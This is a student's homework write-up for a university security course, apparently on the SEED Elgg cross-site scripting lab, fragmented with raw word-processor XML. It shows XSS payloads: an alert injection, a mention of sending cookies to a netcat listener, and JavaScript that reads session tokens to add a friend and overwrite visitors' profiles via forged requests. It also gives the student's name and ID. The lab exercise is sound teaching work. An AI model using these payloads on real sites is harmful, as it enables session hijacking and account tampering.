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System Security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EECS 121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HW5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Kyle Zyler Cayanan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80576955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03/16/2024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left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_br44jin8ekj8" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Posting a Malicious Message to Display an Alert Window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this task, we are abusing the text boxes to run our javascript. In the screenshot below we are putting the following javascript code into the Brief Description field.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&lt;script&gt;alert(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'XSS'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we save and refresh the javascript code into Alice’s profile, our javascript runs and we get the alert.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also verify that another user gets this alert if we log out and go to Alice’s profile.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73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after logging out we still get the same alert.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colnq8h9xqzd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odxnw2dzh0nb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - Posting a Malicious Message to Display Cookies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task is similar to the first task and we see it produce the same result.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73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kppfr1yijz6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1ztv3v8gsifh" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 - Stealing Cookies from the Victim’s Machine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task is also similar to task 1 and 2. Through our netcat listener, with the verbose mode enabled, we can even see the same cookie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55roa117pk9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xwlph01saysi" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4 - Becoming the Victim’s Friend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We use the following code for this task.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&lt;script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type=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"text/javascript"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window.onload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function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Ajax=null;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"&amp;__elgg_ts="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+elgg.security.token.__elgg_ts;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token=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"&amp;__elgg_token="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+elgg.security.token.__elgg_token;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//Construct the HTTP request to add Samy as a friend.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sendurl=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"http://www.seed-server.com/action/friends/add?friend=59"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+ts+token;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//FILL IN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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//Create and send Ajax request to add friend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XMLHttpRequest();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Ajax.open(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"GET"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sendurl,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Ajax.send();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We’ve placed this code in the ‘About Me’ section of Samy’s profile using the Text editing mode specified by the lab instructions.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To build our HTTP request we were able to find the following link using the HTTP Header Live add-on to inspect the url. We got this URL from trying to add Samy as a friend from a different account. We see the friend value for Samy is 59 and it is followed by the cookie id and token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http://www.seed-server.com/action/friends/add?friend=59&amp;__elgg_ts=1710648399&amp;__elgg_token=95-XfIOhST0_vDUeyMYHmw&amp;__elgg_ts=1710648399&amp;__elgg_token=95-XfIOhST0_vDUeyMYHmw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In the following screenshots we view Samy’s profile from Charlie’s account and observe that the code works.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10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We can see that the code worked and through the HTTP Header Live add-on, our javascript ran through the Ajax.js file where it was loaded into.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Question 1: Explain the purpose of Lines ➀ and ➁, why are they are needed?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lines are needed to construct our HTTP request, we can append these values that are retrieved automatically from these lines of code.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Question 2: If the Elgg application only provides the Editor mode for the "About Me" field, i.e.,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you cannot switch to the Text mode, can you still launch a successful attack?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the Editor Mode adds additional code, it would get wrapped in HTML code that would likely interfere with our code.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s2ylt2qvpz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0lh252vqts5" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 - Modifying the Victim’s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have constructed the following code:</w:t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&lt;script type=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"text/javascript"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window.onload =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//JavaScript code to access user name, user guid, Time Stamp __elgg_ts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//and Security Token __elgg_token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userName=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"&amp;name="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+elgg.session.user.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guid=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"&amp;guid="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+elgg.session.user.guid;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"&amp;__elgg_ts="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+elgg.security.token.__elgg_ts;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token=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"&amp;__elgg_token="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+elgg.security.token.__elgg_token;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//Construct the content of your url.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content=token + ts + userName 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"&amp;description=Samy was here."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+ guid;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//FILL IN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samyGuid=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//FILL IN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sendurl=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"http://www.seed-server.com/action/profile/edit"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//FILL IN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(elgg.session.user.guid!=samyGuid)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//Create and send Ajax request to modify profile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Ajax=null;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Ajax=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XMLHttpRequest();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Ajax.open(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"POST"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 sendurl, true);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Ajax.setRequestHeader(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"Content-Type"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"application/x-www-form-urlencoded"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Ajax.send(content);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should essentially send an HTTP POST request to the server and set the description of the visitor’s profile.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41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Question 3: Why do we need Line ➀? Remove this line, and repeat your attack. Report and explain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observation.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  <w:t xml:space="preserve">To answer this question I modified the code to the following:</w:t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&lt;script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type=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"text/javascript"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window.onload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//JavaScript code to access user name, user guid, Time Stamp __elgg_ts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//and Security Token __elgg_token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userName=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"&amp;name="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+elgg.session.user.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guid=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"&amp;guid="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+elgg.session.user.guid;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"&amp;__elgg_ts="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+elgg.security.token.__elgg_ts;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token=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"&amp;__elgg_token="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+elgg.security.token.__elgg_token;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//Construct the content of your url.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content=token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userName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"&amp;description=Samy was here. No Line 1"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guid;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//FILL IN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samyGuid=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//FILL IN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sendurl=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"http://www.seed-server.com/action/profile/edit"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//FILL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With the modified code it doesn’t seem to work. So it seems that we will need Line 1 because we need to ensure we cannot overwrite Samy’s own code on his own profile.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6ewedk93upp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Name: Kyle Zyler Cayanan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ID: 80576955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EECS 121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I, Kyle Zyler Cayanan, hereby clarify that the files submitted represent my own work,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that I did not copy any code from any other individuals or sources,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and that I did not share my code with only other students.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hanging="360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